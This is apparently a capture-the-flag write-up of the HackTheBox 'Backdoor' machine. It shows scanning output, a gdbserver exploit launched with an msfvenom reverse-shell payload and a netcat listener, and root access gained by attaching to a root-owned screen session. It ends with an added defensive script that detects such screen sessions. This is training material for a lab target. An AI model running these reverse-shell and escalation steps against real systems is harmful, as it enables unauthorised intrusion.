Backdoor is one of the machines currently available on the HackTheBox hacking platform, rated Easy difficulty.
In this case it is a machine based on the Linux operating system.
Port scan
As usual, we add the Backdoor machine's IP 10.10.11.125 to /etc/hosts as backdoor.htb and start with an nmap port scan.
# Nmap 7.92 scan initiated Wed Dec 29 11:59:58 2021 as: nmap -sV -sC -p- -oA enumeration/nmap2 10.10.11.125
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.050s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 29 12:00:41 2021 -- 1 IP address (1 host up) scanned in 43.49 seconds
We see several open ports, so let's look at what we can find on each of them.
Enumeration
The scan itself already shows a web portal running the WordPress CMS, version 5.8.1. Opening the portal we find the following screen.
Having identified the version, we run several enumerations to see what else we can find, starting with directory enumeration using gobuster.
$ gobuster dir -u http://backdoor.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 150
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://backdoor.htb/
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/29 11:56:59 Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
/wp-includes          (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
/wp-admin             (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
/server-status        (Status: 403) [Size: 277]
===============================================================
2021/12/29 11:58:44 Finished
===============================================================
Available exploits
$ searchsploit Wordpress 5.8.1
------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ ---------------------------------
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities     | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection               | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection             | php/webapps/48918.sh
------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Or a scan with the wpscan tool
$ wpscan --url http://backdoor.htb --api-token sxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_______________________________________________________________

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://backdoor.htb/ [10.10.11.125]
[+] Started: Wed Dec 29 12:04:37 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://backdoor.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
 |     Fixed in: 5.8.2
 |     References:
 |      - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
 |      - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/54207

[+] WordPress theme in use: twentyseventeen
 | Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <=========================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Wed Dec 29 12:04:46 2021
[+] Requests Done: 175
[+] Cached Requests: 5
[+] Data Sent: 44.419 KB
[+] Data Received: 518.888 KB
[+] Memory used: 241.133 MB
[+] Elapsed time: 00:00:09
Reviewing these results and searching on Google turns up a few options but nothing relevant at this point, so we move on to port 1337, which corresponds to gdbserver, and find a Python exploit for it that gives us access to the machine.
So, following the exploit's help:
$ python3 gdbexploit.py -h
Usage: python3 gdbexploit.py <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver    ->  10.10.10.200:1337
- Attacker's listener   ->  10.10.10.100:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 4444

3. Run the exploit:
$ python3 gdbexploit.py 10.10.10.200:1337 rev.bin
First we generate our shellcode
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 PrependFork=true -o rev.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 92 bytes
Saved as: rev.bin
We start our netcat listener and launch the exploit
$ python3 gdbexploit.py 10.10.11.125:1337 ../payloads/rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener
And we get access to the machine as the user "user"
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from backdoor.htb [10.10.11.125] 56906
id
uid=1000(user) gid=1000(user) groups=1000(user)
Getting the user flag
Now that we have access, we upgrade to a proper shell with python and grab our flag
user@Backdoor:/home/user$ ls -l
ls -l
total 4
-rw-r----- 1 root user 33 Dec 29 10:57 user.txt
user@Backdoor:/home/user$ cat user.txt
cat user.txt
7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9
user@Backdoor:/home/user$
Privilege escalation
To escalate privileges we review the existing files, permissions, processes, etc., and find an interesting process with pspy
user@Backdoor:/home/user$ ps aux|grep screen
ps aux|grep screen
root 859 0.0 0.0 2608 1600 ? Ss 10:57 0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
It is also executed periodically as root via a cron job, so it could be an option.
We try to run screen ourselves and get an error because no terminal type is defined
user@Backdoor:/home/user$ screen
screen
Please set a terminal type.
So we export the TERM variable with a terminal type
user@Backdoor:/home/user$ export TERM=xterm
export TERM=xterm
And we launch screen, attaching to a previously created session belonging to root whose session name is also root, which escalates us to that user
user@Backdoor:/home/user$ screen -x root/root
root@Backdoor:~# id
id
uid=0(root) gid=0(root) groups=0(root)
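As a defender-side check added here (not part of the original writeup), the following Python script flags processes of a given user that run or keep respawning a detached screen session, like the root loop above, and reports whether a screen binary carries the setuid bit; the `ps aux` sample is constructed, and the path /usr/bin/screen is an assumption.

```python
import os
import re
import stat

# Constructed sample of `ps aux` output, modelled on the root loop the writeup
# found on Backdoor (not captured from the real box).
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 169000 11000 ?        Ss   10:57   0:01 /sbin/init
root       859  0.0  0.0   2608  1600 ?        Ss   10:57   0:00 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \\;; done
root       871  0.0  0.0   6100  2100 ?        Ss   10:57   0:00 SCREEN -dmS root
user      1204  0.0  0.1   8000  4100 pts/0    S    11:05   0:00 bash
"""

DMS_RE = re.compile(r"\bscreen\s+-dmS\s+(\S+)", re.IGNORECASE)  # 'screen -dmS <name>' or 'SCREEN -dmS <name>'
LOOP_RE = re.compile(r"\bwhile\s+true\b")


def find_detached_screen_sessions(ps_output, owner="root"):
    """Return (pid, session_name, kind) for each process of `owner` that runs or
    re-creates a detached screen session. kind is 'respawn-loop' for a shell
    loop that keeps the session alive and 'session' for the SCREEN process."""
    hits = []
    for line in ps_output.splitlines()[1:]:        # skip the header row
        fields = line.split(None, 10)              # COMMAND keeps its spaces
        if len(fields) < 11 or fields[0] != owner:
            continue
        m = DMS_RE.search(fields[10])
        if not m:
            continue
        kind = "respawn-loop" if LOOP_RE.search(fields[10]) else "session"
        hits.append((int(fields[1]), m.group(1), kind))
    return hits


def setuid_owner(path):
    """Return the owner uid of `path` if its setuid bit is set, else None.
    Attaching to another user's session with `screen -x user/session` needs
    either a multiuser session with an ACL entry or a screen that runs as
    root, so a setuid-root binary plus a root session is the risky combination."""
    st = os.stat(path)
    return st.st_uid if st.st_mode & stat.S_ISUID else None


if __name__ == "__main__":
    for pid, name, kind in find_detached_screen_sessions(SAMPLE_PS):
        print(f"[!] root pid {pid} keeps detached screen session '{name}' ({kind})")
    try:  # /usr/bin/screen is an assumed path
        print("setuid owner of /usr/bin/screen:", setuid_owner("/usr/bin/screen"))
    except FileNotFoundError:
        print("screen binary not found at /usr/bin/screen")
```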
Getting the root flag
Now that we are root, all that remains is to get our flag
root@Backdoor:~# ls -l
ls -l
total 4
-rw-r--r-- 1 root root 33 Dec 29 10:57 root.txt
root@Backdoor:~# cat root.txt
cat root.txt
9xxxxxxxxxxxxxxxxxxxxxxxxxxxx0
root@Backdoor:~#
And with that we have our root flag, completing this machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link